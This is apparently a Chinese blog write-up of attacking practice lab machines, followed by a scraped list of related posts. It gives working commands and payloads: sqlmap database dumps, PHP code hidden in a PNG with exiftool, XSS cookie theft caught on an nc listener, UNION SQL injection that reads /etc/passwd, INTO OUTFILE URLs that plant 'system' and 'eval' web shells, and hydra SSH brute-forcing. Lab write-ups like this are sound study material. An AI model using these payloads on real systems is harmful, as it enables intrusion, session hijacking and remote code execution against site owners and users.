xsslabs靶机解题_web 攻击靶机解题过程
sql注入靶机攻击过程请参考
https://pentesterlab.com/exercises/from_sqli_to_shell/course
http://www.sohu.com/a/126855490_472906
xss靶机的攻击过程请参考
https://pentesterlab.com/exercises/xss_and_mysql_file/course
nikto –h 192.168.1.129
sqlmap -u "http://192.168.1.129/cat.php?id=1" --headers="X-Forwarded-For:*" --dbs --batch
sqlmap -u "http://192.168.1.129/cat.php?id=1" --headers="X-Forwarded-For:*" -D photoblog --dump-all --batch
登陆
键入以下命令,使用exiftool将PHP恶意代码隐藏到png图片中:
Cd Desktop
Exiftool “-comment<=raj.php” 1.png
Exiftool 1.png
打开图片那个网址id=4 并查看原图 再写入/cmd.php?cmd=ls/etc
稍微修改一下
在192.168.1.127机器上打开网页:
是个博客系统。
每个博客标题下面可以评价:
测试下是否存在xss漏洞。
发现提交后有弹出框:
进一步构造内容
同时在192.168.179.142机器上用nc打开80端口。
在原来机器上登陆admin账户,密码是p4ssw0rd
登陆进去后查看刚才发布的评论话题。
接着在142这台机器查看nc的返回内容。
获取到cookie信息。
复制下cookie,在142机器上打开评论所在的网页。并修改cookie的值为刚才复制的值。
刷新下页面,发现已经已admin的身份登录进页面中。
进入管理界面后,发现博客编辑界面存在sql注入漏洞。
http://192.168.179.133/admin/edit.php ?id=4 union select 1,2,3,4
发现2和3可以显示出来。
http://192.168.179.133/admin/edit.php ?id=0 union select 1,2,load_file("/etc/passwd"),4
可以读取passwd文件,但是不能读取shadow文件。
在编辑页面发现错误提示中有/var/www/classes 目录,
在查看源码时发现有css目录
尝试后发现/var/www/css 目录可写。
于是构造语句:
http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,3,4%20into%20outfile%20%22/var/www/css/s.php%22
然后打开
http://192.168.179.130/css/s.php
显示:
说明s.php文件成功写入到/var/www/css 目录,下面将
写入z.php中,构造url为:
http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20system($_GET[%27c%27]);%20?%3E%22,4%20into%20outfile%20%22/var/www/css/z.php%22
访问z.php,并使用uname -a获取系统信息。可以远程执行命令。
下面写入一句话木马,构造url:
http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20@eval($_POST[%27chopper%27]);?%3E%22,4%20into%20outfile%20%22/var/www/css/dao.php%22
菜刀链接:
之前发现机器开了ssh,因此用hydra爆破下:
ssh登陆
xsslabs靶机解题_web 攻击靶机解题过程相关推荐
- Kali渗透测试——利用metasploit攻击靶机WinXP SP1
搭建渗透测试环境 Kali攻击机 WinXP SP1 靶机 启动metasploit 跟windows RPC相关的漏洞 内部提供的漏洞攻击 靶机winxp sp1网络配置 查看虚拟机的NAT网段 配 ...
- 用户不必了解计算机的内部结构,用户不必了解计算机的内部结构,主要考虑解题算法和步骤,以过程为中心的编程思想,称为()语言...
用户不必了解计算机的内部结构,主要考虑解题算法和步骤,以过程为中心的编程思想,称为()语言 更多相关问题 以下哪个选项不属于相关研究的内容? 分离变量法是人们基于两个重要事实提出来的,它们分别是:波动 ...
- 用计算机解题前 需要将解题方法,算法及其表示方法
科学技术的进步,社会生产力的发展,都是由于相关的问题得到不断的解决的结果.在当今社会中,由于信息化概念的提出,许多问题的解决都使用到了电子计算机.人们解决问题一般使用到以下两种方法: 1.人工解题 2 ...
- php %3c php 攻击,web 攻击靶机解题过程
sql注入靶机攻击过程请参考 https://pentesterlab.com/exercises/from_sqli_to_shell/course http://www.sohu.com/a/12 ...
- web 攻击靶机解题过程
sql注入靶机攻击过程请参考 https://pentesterlab.com/exercises/from_sqli_to_shell/course http://www.sohu.com/a/12 ...
- 最详细的系统漏洞扫描并对靶机进行利用攻击演练(模拟一次黑客白帽子操作)
万万不可做坏事,仅为学习参考使用. 一.前提准备 1.所需条件: (1)kali2.0 linux 的iso文件(最好是32位,为安装nessus做好装备) 下载网址:https://www.kali ...
- 学习日记1:用msf工具利用永恒之蓝漏洞攻击靶机
一.vm虚拟机构建靶机实现互通 两个虚拟机都用NAT转换地址,设置DHCP分配IP,保证两台虚拟机和物理机在一个网段 二.kali上安装msf工具 apt-get install msf 三.msf工 ...
- %3c?php@ eval($_post['post']);?%3e,web 攻击靶机
1.sql注入靶机攻击php 首先搭建虚拟机 用kali扫描下当前网段netdiscover -r 192.168.2.0/24css 发现可疑ip地址192.168.2.129sql 并使用nmap ...
- kali linux攻击靶机win2K3实验------FTP匿名登录漏洞
由于FTP没有禁止匿名用户,所以可以直接使用Anonymous用户直接登录FTP服务器. 1.win2k3靶机FTP搭建 step1:安装win2k3FTP服务所需要的文件IIS6.0 ...
最新文章
- 沈阳初步建成国内领先的城市级大数据资源库
- 【Linux系统编程】可重入函数和不可重入函数
- vivado软件如何查看内部器件的仿真信号
- 知乎高赞:如果你是一个 Java 面试官,你会问哪些问题....
- c语言过程化程序设计方法,程序的设计基础(C语言入门及编程环境)(修改).ppt
- java 版本EChart使用
- dd-wrt 定时重连 pppoe 更换ip地址
- 2017.5.12PM
- Win8怎么在桌面显示我的电脑
- linux gvim字体大小配置,Gvim 字体大小设置
- 今日干货:PDF转Word工具有哪些?
- 原 《老路用得上的商学课》76-80学习笔记
- PS27种图层混合模式
- [图像处理-1]:颜色中英文对照表 颜色名字 色彩名称
- 检测屏幕.html,15款html5响应式网站跨屏幕测试工具
- JAVA必背面试题和项目面试通关要点
- 【腾讯Bugly干货分享】从0到1打造直播 App
- 四万高手过招,这份阿里全球数学竞赛试题你真的不要看吗...
- 魔百盒M301A免拆机线刷固件-九联代工-S905L2(附教程)
- java 监控 emc 存储_EMC存储VNX5500搜集日志
热门文章
- 【人脸识别终结者】多伦多大学反人脸识别,身份欺骗成功率达99.5%
- 英特尔助力完善AI人才培养,携手微软共促地球可持续发展
- 你知道吗?其实 Oracle 直方图自动统计算法存在这些缺陷!(附验证步骤)
- 一文看懂Microsoft Azure的十年变迁
- Hadoop精华问答 | hadoop能干什么?
- 我的世界1.8.9无需正版的服务器,我的世界1period;8period;9服务器纯洁服地址 | 手游网游页游攻略大全...
- mysql基础和高级整理_mysql基础整理01
- 最小覆盖模型matlab_数学规划模型的matlab求解 非线性最小二乘lsqnonlin
- 引用和指针的区别都有什么_C++指针与引用的区别
- 王者荣耀服务器未响应8月5日苹果,王者荣耀:世冠小组赛8月5日前瞻预测